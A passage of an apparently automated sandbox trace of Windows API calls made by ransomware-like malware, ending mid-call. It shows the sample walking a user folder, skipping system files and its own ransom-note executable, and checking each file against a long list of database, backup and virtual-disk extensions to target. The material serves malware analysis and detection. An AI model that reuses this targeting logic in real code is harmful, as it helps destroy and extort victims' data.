GetLastError () returned 0x0 [0059.898] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0059.898] ReadFile (in: hFile=0x12c, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0059.898] CloseHandle (hObject=0x12c) returned 1 [0059.898] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0059.898] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0059.898] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Recent\\CustomDestinations\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x49ea2ca0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49ea2ca0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0059.898] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0059.898] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0059.898] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0059.898] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x49ea2ca0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49ea2ca0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0059.899] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0059.899] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0059.899] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0059.899] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0059.899] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6404e40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6404e40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x15c7376, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1b4dd67f29cb1962.customDestinations-ms", cAlternateFileName="1B4DD6~1.CUS")) returned 1 [0059.899] lstrcmpiW (lpString1="1b4dd67f29cb1962.customDestinations-ms", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0059.899] lstrcmpiW (lpString1="1b4dd67f29cb1962.customDestinations-ms", lpString2="aoldtz.exe") returned -1 [0059.899] lstrcmpiW (lpString1="1b4dd67f29cb1962.customDestinations-ms", lpString2=".") returned 1 [0059.899] lstrcmpiW (lpString1="1b4dd67f29cb1962.customDestinations-ms", lpString2="..") returned 1 [0059.899] lstrcmpiW (lpString1="1b4dd67f29cb1962.customDestinations-ms", lpString2="windows") returned -1 [0059.899] lstrcmpiW (lpString1="1b4dd67f29cb1962.customDestinations-ms", lpString2="bootmgr") returned -1 [0059.899] lstrcmpiW (lpString1="1b4dd67f29cb1962.customDestinations-ms", lpString2="temp") returned -1 [0059.899] lstrcmpiW (lpString1="1b4dd67f29cb1962.customDestinations-ms", lpString2="pagefile.sys") returned -1 [0059.899] lstrcmpiW (lpString1="1b4dd67f29cb1962.customDestinations-ms", lpString2="boot") returned -1 [0059.899] lstrcmpiW (lpString1="1b4dd67f29cb1962.customDestinations-ms", lpString2="ids.txt") returned -1 [0059.899] lstrcmpiW (lpString1="1b4dd67f29cb1962.customDestinations-ms", lpString2="ntuser.dat") returned -1 [0059.899] lstrcmpiW (lpString1="1b4dd67f29cb1962.customDestinations-ms", lpString2="perflogs") returned -1 [0059.899] lstrcmpiW (lpString1="1b4dd67f29cb1962.customDestinations-ms", lpString2="MSBuild") returned -1 [0059.899] lstrlenW (lpString="1b4dd67f29cb1962.customDestinations-ms") returned 38 [0059.899] lstrlenW (lpString="C:\\Users\\Default User\\Recent\\CustomDestinations\\*") returned 49 [0059.899] lstrcpyW (in: lpString1=0x2cce460, lpString2="1b4dd67f29cb1962.customDestinations-ms" | out: lpString1="1b4dd67f29cb1962.customDestinations-ms") returned="1b4dd67f29cb1962.customDestinations-ms" [0059.899] lstrlenW (lpString="1b4dd67f29cb1962.customDestinations-ms") returned 38 [0059.899] lstrlenW (lpString="Ares865") returned 7 [0059.899] lstrcmpiW (lpString1="ions-ms", lpString2="Ares865") returned 1 [0059.899] lstrlenW (lpString=".dll") returned 4 [0059.899] lstrcmpiW (lpString1="1b4dd67f29cb1962.customDestinations-ms", lpString2=".dll") returned 1 [0059.899] lstrlenW (lpString=".lnk") returned 4 [0059.899] lstrcmpiW (lpString1="1b4dd67f29cb1962.customDestinations-ms", lpString2=".lnk") returned 1 [0059.899] lstrlenW (lpString=".ini") returned 4 [0059.899] lstrcmpiW (lpString1="1b4dd67f29cb1962.customDestinations-ms", lpString2=".ini") returned 1 [0059.899] lstrlenW (lpString=".sys") returned 4 [0059.899] lstrcmpiW (lpString1="1b4dd67f29cb1962.customDestinations-ms", lpString2=".sys") returned 1 [0059.899] lstrlenW (lpString="1b4dd67f29cb1962.customDestinations-ms") returned 38 [0059.899] lstrlenW (lpString="bak") returned 3 [0059.899] lstrcmpiW (lpString1="-ms", lpString2="bak") returned 1 [0059.899] lstrlenW (lpString="ba_") returned 3 [0059.900] lstrcmpiW (lpString1="-ms", lpString2="ba_") returned 1 [0059.900] lstrlenW (lpString="dbb") returned 3 [0059.900] lstrcmpiW (lpString1="-ms", lpString2="dbb") returned 1 [0059.900] lstrlenW (lpString="vmdk") returned 4 [0059.900] lstrcmpiW (lpString1="s-ms", lpString2="vmdk") returned -1 [0059.900] lstrlenW (lpString="rar") returned 3 [0059.900] lstrcmpiW (lpString1="-ms", lpString2="rar") returned -1 [0059.900] lstrlenW (lpString="zip") returned 3 [0059.900] lstrcmpiW (lpString1="-ms", lpString2="zip") returned -1 [0059.900] lstrlenW (lpString="tgz") returned 3 [0059.900] lstrcmpiW (lpString1="-ms", lpString2="tgz") returned -1 [0059.900] lstrlenW (lpString="vbox") returned 4 [0059.900] lstrcmpiW (lpString1="s-ms", lpString2="vbox") returned -1 [0059.900] lstrlenW (lpString="vdi") returned 3 [0059.900] lstrcmpiW (lpString1="-ms", lpString2="vdi") returned -1 [0059.900] lstrlenW (lpString="vhd") returned 3 [0059.900] lstrcmpiW (lpString1="-ms", lpString2="vhd") returned -1 [0059.900] lstrlenW (lpString="vhdx") returned 4 [0059.900] lstrcmpiW (lpString1="s-ms", lpString2="vhdx") returned -1 [0059.900] lstrlenW (lpString="avhd") returned 4 [0059.900] lstrcmpiW (lpString1="s-ms", lpString2="avhd") returned 1 [0059.900] lstrlenW (lpString="db") returned 2 [0059.900] lstrcmpiW (lpString1="ms", lpString2="db") returned 1 [0059.900] lstrlenW (lpString="db2") returned 3 [0059.900] lstrcmpiW (lpString1="-ms", lpString2="db2") returned 1 [0059.900] lstrlenW (lpString="db3") returned 3 [0059.900] lstrcmpiW (lpString1="-ms", lpString2="db3") returned 1 [0059.900] lstrlenW (lpString="dbf") returned 3 [0059.900] lstrcmpiW (lpString1="-ms", lpString2="dbf") returned 1 [0059.900] lstrlenW (lpString="mdf") returned 3 [0059.900] lstrcmpiW (lpString1="-ms", lpString2="mdf") returned 1 [0059.900] lstrlenW (lpString="mdb") returned 3 [0059.900] lstrcmpiW (lpString1="-ms", lpString2="mdb") returned 1 [0059.900] lstrlenW (lpString="sql") returned 3 [0059.900] lstrcmpiW (lpString1="-ms", lpString2="sql") returned -1 [0059.900] lstrlenW (lpString="sqlite") returned 6 [0059.900] lstrcmpiW (lpString1="ons-ms", lpString2="sqlite") returned -1 [0059.901] lstrlenW (lpString="sqlite3") returned 7 [0059.901] lstrcmpiW (lpString1="ions-ms", lpString2="sqlite3") returned -1 [0059.901] lstrlenW (lpString="sqlitedb") returned 8 [0059.901] lstrcmpiW (lpString1="tions-ms", lpString2="sqlitedb") returned 1 [0059.901] lstrlenW (lpString="xml") returned 3 [0059.901] lstrcmpiW (lpString1="-ms", lpString2="xml") returned -1 [0059.901] lstrlenW (lpString="$er") returned 3 [0059.901] lstrcmpiW (lpString1="-ms", lpString2="$er") returned 1 [0059.901] lstrlenW (lpString="4dd") returned 3 [0059.901] lstrcmpiW (lpString1="-ms", lpString2="4dd") returned 1 [0059.901] lstrlenW (lpString="4dl") returned 3 [0059.901] lstrcmpiW (lpString1="-ms", lpString2="4dl") returned 1 [0059.901] lstrlenW (lpString="^^^") returned 3 [0059.901] lstrcmpiW (lpString1="-ms", lpString2="^^^") returned 1 [0059.901] lstrlenW (lpString="abs") returned 3 [0059.901] lstrcmpiW (lpString1="-ms", lpString2="abs") returned 1 [0059.901] lstrlenW (lpString="abx") returned 3 [0059.901] lstrcmpiW (lpString1="-ms", lpString2="abx") returned 1 [0059.901] lstrlenW (lpString="accdb") returned 5 [0059.901] lstrcmpiW (lpString1="ns-ms", lpString2="accdb") returned 1 [0059.901] lstrlenW (lpString="accdc") returned 5 [0059.901] lstrcmpiW (lpString1="ns-ms", lpString2="accdc") returned 1 [0059.901] lstrlenW (lpString="accde") returned 5 [0059.901] lstrcmpiW (lpString1="ns-ms", lpString2="accde") returned 1 [0059.901] lstrlenW (lpString="accdr") returned 5 [0059.901] lstrcmpiW (lpString1="ns-ms", lpString2="accdr") returned 1 [0059.901] lstrlenW (lpString="accdt") returned 5 [0059.901] lstrcmpiW (lpString1="ns-ms", lpString2="accdt") returned 1 [0059.901] lstrlenW (lpString="accdw") returned 5 [0059.901] lstrcmpiW (lpString1="ns-ms", lpString2="accdw") returned 1 [0059.901] lstrlenW (lpString="accft") returned 5 [0059.901] lstrcmpiW (lpString1="ns-ms", lpString2="accft") returned 1 [0059.901] lstrlenW (lpString="adb") returned 3 [0059.901] lstrcmpiW (lpString1="-ms", lpString2="adb") returned 1 [0059.901] lstrlenW (lpString="adb") returned 3 [0059.901] lstrcmpiW (lpString1="-ms", lpString2="adb") returned 1 [0059.901] lstrlenW (lpString="ade") returned 3 [0059.901] lstrcmpiW (lpString1="-ms", lpString2="ade") returned 1 [0059.902] lstrlenW (lpString="adf") returned 3 [0059.902] lstrcmpiW (lpString1="-ms", lpString2="adf") returned 1 [0059.902] lstrlenW (lpString="adn") returned 3 [0059.902] lstrcmpiW (lpString1="-ms", lpString2="adn") returned 1 [0059.902] lstrlenW (lpString="adp") returned 3 [0059.902] lstrcmpiW (lpString1="-ms", lpString2="adp") returned 1 [0059.902] lstrlenW (lpString="alf") returned 3 [0059.902] lstrcmpiW (lpString1="-ms", lpString2="alf") returned 1 [0059.902] lstrlenW (lpString="ask") returned 3 [0059.902] lstrcmpiW (lpString1="-ms", lpString2="ask") returned 1 [0059.902] lstrlenW (lpString="btr") returned 3 [0059.902] lstrcmpiW (lpString1="-ms", lpString2="btr") returned 1 [0059.902] lstrlenW (lpString="cat") returned 3 [0059.902] lstrcmpiW (lpString1="-ms", lpString2="cat") returned 1 [0059.902] lstrlenW (lpString="cdb") returned 3 [0059.902] lstrcmpiW (lpString1="-ms", lpString2="cdb") returned 1 [0059.902] lstrlenW (lpString="ckp") returned 3 [0059.902] lstrcmpiW (lpString1="-ms", lpString2="ckp") returned 1 [0059.902] lstrlenW (lpString="cma") returned 3 [0059.902] lstrcmpiW (lpString1="-ms", lpString2="cma") returned 1 [0059.902] lstrlenW (lpString="cpd") returned 3 [0059.902] lstrcmpiW (lpString1="-ms", lpString2="cpd") returned 1 [0059.902] lstrlenW (lpString="dacpac") returned 6 [0059.902] lstrcmpiW (lpString1="ons-ms", lpString2="dacpac") returned 1 [0059.902] lstrlenW (lpString="dad") returned 3 [0059.902] lstrcmpiW (lpString1="-ms", lpString2="dad") returned 1 [0059.902] lstrlenW (lpString="dadiagrams") returned 10 [0059.902] lstrcmpiW (lpString1="nations-ms", lpString2="dadiagrams") returned 1 [0059.902] lstrlenW (lpString="daschema") returned 8 [0059.902] lstrcmpiW (lpString1="tions-ms", lpString2="daschema") returned 1 [0059.902] lstrlenW (lpString="db-journal") returned 10 [0059.902] lstrcmpiW (lpString1="nations-ms", lpString2="db-journal") returned 1 [0059.902] lstrlenW (lpString="db-shm") returned 6 [0059.902] lstrcmpiW (lpString1="ons-ms", lpString2="db-shm") returned 1 [0059.902] lstrlenW (lpString="db-wal") returned 6 [0059.902] lstrcmpiW (lpString1="ons-ms", lpString2="db-wal") returned 1 [0059.902] lstrlenW (lpString="dbc") returned 3 [0059.903] lstrcmpiW (lpString1="-ms", lpString2="dbc") returned 1 [0059.903] lstrlenW (lpString="dbs") returned 3 [0059.903] lstrcmpiW (lpString1="-ms", lpString2="dbs") returned 1 [0059.903] lstrlenW (lpString="dbt") returned 3 [0059.903] lstrcmpiW (lpString1="-ms", lpString2="dbt") returned 1 [0059.903] lstrlenW (lpString="dbv") returned 3 [0059.903] lstrcmpiW (lpString1="-ms", lpString2="dbv") returned 1 [0059.903] lstrlenW (lpString="dbx") returned 3 [0059.903] lstrcmpiW (lpString1="-ms", lpString2="dbx") returned 1 [0059.903] lstrlenW (lpString="dcb") returned 3 [0059.903] lstrcmpiW (lpString1="-ms", lpString2="dcb") returned 1 [0059.903] lstrlenW (lpString="dct") returned 3 [0059.903] lstrcmpiW (lpString1="-ms", lpString2="dct") returned 1 [0059.903] lstrlenW (lpString="dcx") returned 3 [0059.903] lstrcmpiW (lpString1="-ms", lpString2="dcx") returned 1 [0059.903] lstrlenW (lpString="ddl") returned 3 [0059.903] lstrcmpiW (lpString1="-ms", lpString2="ddl") returned 1 [0059.903] lstrlenW (lpString="dlis") returned 4 [0059.903] lstrcmpiW (lpString1="s-ms", lpString2="dlis") returned 1 [0059.903] lstrlenW (lpString="dp1") returned 3 [0059.903] lstrcmpiW (lpString1="-ms", lpString2="dp1") returned 1 [0059.903] lstrlenW (lpString="dqy") returned 3 [0059.903] lstrcmpiW (lpString1="-ms", lpString2="dqy") returned 1 [0059.903] lstrlenW (lpString="dsk") returned 3 [0059.903] lstrcmpiW (lpString1="-ms", lpString2="dsk") returned 1 [0059.903] lstrlenW (lpString="dsn") returned 3 [0059.903] lstrcmpiW (lpString1="-ms", lpString2="dsn") returned 1 [0059.903] lstrlenW (lpString="dtsx") returned 4 [0059.903] lstrcmpiW (lpString1="s-ms", lpString2="dtsx") returned 1 [0059.903] lstrlenW (lpString="dxl") returned 3 [0059.903] lstrcmpiW (lpString1="-ms", lpString2="dxl") returned 1 [0059.903] lstrlenW (lpString="eco") returned 3 [0059.903] lstrcmpiW (lpString1="-ms", lpString2="eco") returned 1 [0059.903] lstrlenW (lpString="ecx") returned 3 [0059.903] lstrcmpiW (lpString1="-ms", lpString2="ecx") returned 1 [0059.903] lstrlenW (lpString="edb") returned 3 [0059.903] lstrcmpiW (lpString1="-ms", lpString2="edb") returned 1 [0059.903] lstrlenW (lpString="epim") returned 4 [0059.904] lstrcmpiW (lpString1="s-ms", lpString2="epim") returned 1 [0059.904] lstrlenW (lpString="fcd") returned 3 [0059.904] lstrcmpiW (lpString1="-ms", lpString2="fcd") returned 1 [0059.904] lstrlenW (lpString="fdb") returned 3 [0059.904] lstrcmpiW (lpString1="-ms", lpString2="fdb") returned 1 [0059.904] lstrlenW (lpString="fic") returned 3 [0059.904] lstrcmpiW (lpString1="-ms", lpString2="fic") returned 1 [0059.904] lstrlenW (lpString="flexolibrary") returned 12 [0059.907] lstrcmpiW (lpString1="tinations-ms", lpString2="flexolibrary") returned 1 [0059.907] lstrlenW (lpString="fm5") returned 3 [0059.908] lstrcmpiW (lpString1="-ms", lpString2="fm5") returned 1 [0059.908] lstrlenW (lpString="fmp") returned 3 [0059.908] lstrcmpiW (lpString1="-ms", lpString2="fmp") returned 1 [0059.908] lstrlenW (lpString="fmp12") returned 5 [0059.908] lstrcmpiW (lpString1="ns-ms", lpString2="fmp12") returned 1 [0059.908] lstrlenW (lpString="fmpsl") returned 5 [0059.908] lstrcmpiW (lpString1="ns-ms", lpString2="fmpsl") returned 1 [0059.908] lstrlenW (lpString="fol") returned 3 [0059.908] lstrcmpiW (lpString1="-ms", lpString2="fol") returned 1 [0059.908] lstrlenW (lpString="fp3") returned 3 [0059.908] lstrcmpiW (lpString1="-ms", lpString2="fp3") returned 1 [0059.908] lstrlenW (lpString="fp4") returned 3 [0059.908] lstrcmpiW (lpString1="-ms", lpString2="fp4") returned 1 [0059.908] lstrlenW (lpString="fp5") returned 3 [0059.908] lstrcmpiW (lpString1="-ms", lpString2="fp5") returned 1 [0059.908] lstrlenW (lpString="fp7") returned 3 [0059.908] lstrcmpiW (lpString1="-ms", lpString2="fp7") returned 1 [0059.908] lstrlenW (lpString="fpt") returned 3 [0059.908] lstrcmpiW (lpString1="-ms", lpString2="fpt") returned 1 [0059.908] lstrlenW (lpString="frm") returned 3 [0059.908] lstrcmpiW (lpString1="-ms", lpString2="frm") returned 1 [0059.908] lstrlenW (lpString="gdb") returned 3 [0059.908] lstrcmpiW (lpString1="-ms", lpString2="gdb") returned 1 [0059.908] lstrlenW (lpString="gdb") returned 3 [0059.908] lstrcmpiW (lpString1="-ms", lpString2="gdb") returned 1 [0059.908] lstrlenW (lpString="grdb") returned 4 [0059.908] lstrcmpiW (lpString1="s-ms", lpString2="grdb") returned 1 [0059.908] lstrlenW (lpString="gwi") returned 3 [0059.908] lstrcmpiW (lpString1="-ms", lpString2="gwi") returned 1 [0059.908] lstrlenW (lpString="hdb") returned 3 [0059.908] lstrcmpiW (lpString1="-ms", lpString2="hdb") returned 1 [0059.908] lstrlenW (lpString="his") returned 3 [0059.908] lstrcmpiW (lpString1="-ms", lpString2="his") returned 1 [0059.908] lstrlenW (lpString="ib") returned 2 [0059.908] lstrcmpiW (lpString1="ms", lpString2="ib") returned 1 [0059.908] lstrlenW (lpString="idb") returned 3 [0059.908] lstrcmpiW (lpString1="-ms", lpString2="idb") returned 1 [0059.908] lstrlenW (lpString="ihx") returned 3 [0059.909] lstrcmpiW (lpString1="-ms", lpString2="ihx") returned 1 [0059.909] lstrlenW (lpString="itdb") returned 4 [0059.909] lstrcmpiW (lpString1="s-ms", lpString2="itdb") returned 1 [0059.909] lstrlenW (lpString="itw") returned 3 [0059.910] lstrcmpiW (lpString1="-ms", lpString2="itw") returned 1 [0059.910] lstrlenW (lpString="jet") returned 3 [0059.910] lstrcmpiW (lpString1="-ms", lpString2="jet") returned 1 [0059.910] lstrlenW (lpString="jtx") returned 3 [0059.910] lstrcmpiW (lpString1="-ms", lpString2="jtx") returned 1 [0059.910] lstrlenW (lpString="kdb") returned 3 [0059.910] lstrcmpiW (lpString1="-ms", lpString2="kdb") returned 1 [0059.910] lstrlenW (lpString="kexi") returned 4 [0059.910] lstrcmpiW (lpString1="s-ms", lpString2="kexi") returned 1 [0059.910] lstrlenW (lpString="kexic") returned 5 [0059.910] lstrcmpiW (lpString1="ns-ms", lpString2="kexic") returned 1 [0059.910] lstrlenW (lpString="kexis") returned 5 [0059.910] lstrcmpiW (lpString1="ns-ms", lpString2="kexis") returned 1 [0059.910] lstrlenW (lpString="lgc") returned 3 [0059.910] lstrcmpiW (lpString1="-ms", lpString2="lgc") returned 1 [0059.910] lstrlenW (lpString="lwx") returned 3 [0059.910] lstrcmpiW (lpString1="-ms", lpString2="lwx") returned 1 [0059.910] lstrlenW (lpString="maf") returned 3 [0059.910] lstrcmpiW (lpString1="-ms", lpString2="maf") returned 1 [0059.910] lstrlenW (lpString="maq") returned 3 [0059.910] lstrcmpiW (lpString1="-ms", lpString2="maq") returned 1 [0059.910] lstrlenW (lpString="mar") returned 3 [0059.910] lstrcmpiW (lpString1="-ms", lpString2="mar") returned 1 [0059.910] lstrlenW (lpString="marshal") returned 7 [0059.910] lstrcmpiW (lpString1="ions-ms", lpString2="marshal") returned -1 [0059.910] lstrlenW (lpString="mas") returned 3 [0059.910] lstrcmpiW (lpString1="-ms", lpString2="mas") returned 1 [0059.910] lstrlenW (lpString="mav") returned 3 [0059.910] lstrcmpiW (lpString1="-ms", lpString2="mav") returned 1 [0059.910] lstrlenW (lpString="maw") returned 3 [0059.910] lstrcmpiW (lpString1="-ms", lpString2="maw") returned 1 [0059.911] lstrlenW (lpString="mdbhtml") returned 7 [0059.911] lstrcmpiW (lpString1="ions-ms", lpString2="mdbhtml") returned -1 [0059.911] lstrlenW (lpString="mdn") returned 3 [0059.911] lstrcmpiW (lpString1="-ms", lpString2="mdn") returned 1 [0059.911] lstrlenW (lpString="mdt") returned 3 [0059.911] lstrcmpiW (lpString1="-ms", lpString2="mdt") returned 1 [0059.911] lstrlenW (lpString="mfd") returned 3 [0059.911] lstrcmpiW (lpString1="-ms", lpString2="mfd") returned 1 [0059.911] lstrlenW (lpString="mpd") returned 3 [0059.911] lstrcmpiW (lpString1="-ms", lpString2="mpd") returned 1 [0059.911] lstrlenW (lpString="mrg") returned 3 [0059.911] lstrcmpiW (lpString1="-ms", lpString2="mrg") returned 1 [0059.911] lstrlenW (lpString="mud") returned 3 [0059.911] lstrcmpiW (lpString1="-ms", lpString2="mud") returned -1 [0059.911] lstrlenW (lpString="mwb") returned 3 [0059.911] lstrcmpiW (lpString1="-ms", lpString2="mwb") returned -1 [0059.911] lstrlenW (lpString="myd") returned 3 [0059.911] lstrcmpiW (lpString1="-ms", lpString2="myd") returned -1 [0059.911] lstrlenW (lpString="ndf") returned 3 [0059.911] lstrcmpiW (lpString1="-ms", lpString2="ndf") returned -1 [0059.911] lstrlenW (lpString="nnt") returned 3 [0059.911] lstrcmpiW (lpString1="-ms", lpString2="nnt") returned -1 [0059.911] lstrlenW (lpString="nrmlib") returned 6 [0059.911] lstrcmpiW (lpString1="ons-ms", lpString2="nrmlib") returned 1 [0059.911] lstrlenW (lpString="ns2") returned 3 [0059.911] lstrcmpiW (lpString1="-ms", lpString2="ns2") returned -1 [0059.911] lstrlenW (lpString="ns3") returned 3 [0059.911] lstrcmpiW (lpString1="-ms", lpString2="ns3") returned -1 [0059.911] lstrlenW (lpString="ns4") returned 3 [0059.911] lstrcmpiW (lpString1="-ms", lpString2="ns4") returned -1 [0059.911] lstrlenW (lpString="nsf") returned 3 [0059.911] lstrcmpiW (lpString1="-ms", lpString2="nsf") returned -1 [0059.911] lstrlenW (lpString="nv") returned 2 [0059.911] lstrcmpiW (lpString1="ms", lpString2="nv") returned -1 [0059.911] lstrlenW (lpString="nv2") returned 3 [0059.911] lstrcmpiW (lpString1="-ms", lpString2="nv2") returned -1 [0059.911] lstrlenW (lpString="nwdb") returned 4 [0059.912] lstrcmpiW (lpString1="s-ms", lpString2="nwdb") returned 1 [0059.912] lstrlenW (lpString="nyf") returned 3 [0059.912] lstrcmpiW (lpString1="-ms", lpString2="nyf") returned -1 [0059.912] lstrlenW (lpString="odb") returned 3 [0059.912] lstrcmpiW (lpString1="-ms", lpString2="odb") returned -1 [0059.912] lstrlenW (lpString="odb") returned 3 [0059.912] lstrcmpiW (lpString1="-ms", lpString2="odb") returned -1 [0059.912] lstrlenW (lpString="oqy") returned 3 [0059.912] lstrcmpiW (lpString1="-ms", lpString2="oqy") returned -1 [0059.912] lstrlenW (lpString="ora") returned 3 [0059.912] lstrcmpiW (lpString1="-ms", lpString2="ora") returned -1 [0059.912] lstrlenW (lpString="orx") returned 3 [0059.912] lstrcmpiW (lpString1="-ms", lpString2="orx") returned -1 [0059.912] lstrlenW (lpString="owc") returned 3 [0059.912] lstrcmpiW (lpString1="-ms", lpString2="owc") returned -1 [0059.912] lstrlenW (lpString="p96") returned 3 [0059.912] lstrcmpiW (lpString1="-ms", lpString2="p96") returned -1 [0059.912] lstrlenW (lpString="p97") returned 3 [0059.912] lstrcmpiW (lpString1="-ms", lpString2="p97") returned -1 [0059.912] lstrlenW (lpString="pan") returned 3 [0059.912] lstrcmpiW (lpString1="-ms", lpString2="pan") returned -1 [0059.912] lstrlenW (lpString="pdb") returned 3 [0059.912] lstrcmpiW (lpString1="-ms", lpString2="pdb") returned -1 [0059.912] lstrlenW (lpString="pdm") returned 3 [0059.912] lstrcmpiW (lpString1="-ms", lpString2="pdm") returned -1 [0059.912] lstrlenW (lpString="pnz") returned 3 [0059.912] lstrcmpiW (lpString1="-ms", lpString2="pnz") returned -1 [0059.912] lstrlenW (lpString="qry") returned 3 [0059.912] lstrcmpiW (lpString1="-ms", lpString2="qry") returned -1 [0059.912] lstrlenW (lpString="qvd") returned 3 [0059.912] lstrcmpiW (lpString1="-ms", lpString2="qvd") returned -1 [0059.912] lstrlenW (lpString="rbf") returned 3 [0059.912] lstrcmpiW (lpString1="-ms", lpString2="rbf") returned -1 [0059.912] lstrlenW (lpString="rctd") returned 4 [0059.912] lstrcmpiW (lpString1="s-ms", lpString2="rctd") returned 1 [0059.912] lstrlenW (lpString="rod") returned 3 [0059.913] lstrcmpiW (lpString1="-ms", lpString2="rod") returned -1 [0059.913] lstrlenW (lpString="rodx") returned 4 [0059.913] lstrcmpiW (lpString1="s-ms", lpString2="rodx") returned 1 [0059.913] lstrlenW (lpString="rpd") returned 3 [0059.913] lstrcmpiW (lpString1="-ms", lpString2="rpd") returned -1 [0059.913] lstrlenW (lpString="rsd") returned 3 [0059.913] lstrcmpiW (lpString1="-ms", lpString2="rsd") returned -1 [0059.913] lstrlenW (lpString="sas7bdat") returned 8 [0059.913] lstrcmpiW (lpString1="tions-ms", lpString2="sas7bdat") returned 1 [0059.913] lstrlenW (lpString="sbf") returned 3 [0059.913] lstrcmpiW (lpString1="-ms", lpString2="sbf") returned -1 [0059.913] lstrlenW (lpString="scx") returned 3 [0059.913] lstrcmpiW (lpString1="-ms", lpString2="scx") returned -1 [0059.913] lstrlenW (lpString="sdb") returned 3 [0059.913] lstrcmpiW (lpString1="-ms", lpString2="sdb") returned -1 [0059.913] lstrlenW (lpString="sdc") returned 3 [0059.913] lstrcmpiW (lpString1="-ms", lpString2="sdc") returned -1 [0059.913] lstrlenW (lpString="sdf") returned 3 [0059.913] lstrcmpiW (lpString1="-ms", lpString2="sdf") returned -1 [0059.913] lstrlenW (lpString="sis") returned 3 [0059.913] lstrcmpiW (lpString1="-ms", lpString2="sis") returned -1 [0059.913] lstrlenW (lpString="spq") returned 3 [0059.913] lstrcmpiW (lpString1="-ms", lpString2="spq") returned -1 [0059.913] lstrlenW (lpString="te") returned 2 [0059.913] lstrcmpiW (lpString1="ms", lpString2="te") returned -1 [0059.913] lstrlenW (lpString="teacher") returned 7 [0059.913] lstrcmpiW (lpString1="ions-ms", lpString2="teacher") returned -1 [0059.913] lstrlenW (lpString="tmd") returned 3 [0059.913] lstrcmpiW (lpString1="-ms", lpString2="tmd") returned -1 [0059.913] lstrlenW (lpString="tps") returned 3 [0059.913] lstrcmpiW (lpString1="-ms", lpString2="tps") returned -1 [0059.913] lstrlenW (lpString="trc") returned 3 [0059.913] lstrcmpiW (lpString1="-ms", lpString2="trc") returned -1 [0059.914] lstrlenW (lpString="trc") returned 3 [0059.914] lstrcmpiW (lpString1="-ms", lpString2="trc") returned -1 [0059.914] lstrlenW (lpString="trm") returned 3 [0059.914] lstrcmpiW (lpString1="-ms", lpString2="trm") returned -1 [0059.914] lstrlenW (lpString="udb") returned 3 [0059.914] lstrcmpiW (lpString1="-ms", lpString2="udb") returned -1 [0059.914] lstrlenW (lpString="udl") returned 3 [0059.914] lstrcmpiW (lpString1="-ms", lpString2="udl") returned -1 [0059.914] lstrlenW (lpString="usr") returned 3 [0059.914] lstrcmpiW (lpString1="-ms", lpString2="usr") returned -1 [0059.914] lstrlenW (lpString="v12") returned 3 [0059.914] lstrcmpiW (lpString1="-ms", lpString2="v12") returned -1 [0059.914] lstrlenW (lpString="vis") returned 3 [0059.914] lstrcmpiW (lpString1="-ms", lpString2="vis") returned -1 [0059.914] lstrlenW (lpString="vpd") returned 3 [0059.914] lstrcmpiW (lpString1="-ms", lpString2="vpd") returned -1 [0059.914] lstrlenW (lpString="vvv") returned 3 [0059.914] lstrcmpiW (lpString1="-ms", lpString2="vvv") returned -1 [0059.914] lstrlenW (lpString="wdb") returned 3 [0059.914] lstrcmpiW (lpString1="-ms", lpString2="wdb") returned -1 [0059.914] lstrlenW (lpString="wmdb") returned 4 [0059.914] lstrcmpiW (lpString1="s-ms", lpString2="wmdb") returned -1 [0059.914] lstrlenW (lpString="wrk") returned 3 [0059.914] lstrcmpiW (lpString1="-ms", lpString2="wrk") returned -1 [0059.914] lstrlenW (lpString="xdb") returned 3 [0059.914] lstrcmpiW (lpString1="-ms", lpString2="xdb") returned -1 [0059.914] lstrlenW (lpString="xld") returned 3 [0059.914] lstrcmpiW (lpString1="-ms", lpString2="xld") returned -1 [0059.914] lstrlenW (lpString="xmlff") returned 5 [0059.914] lstrcmpiW 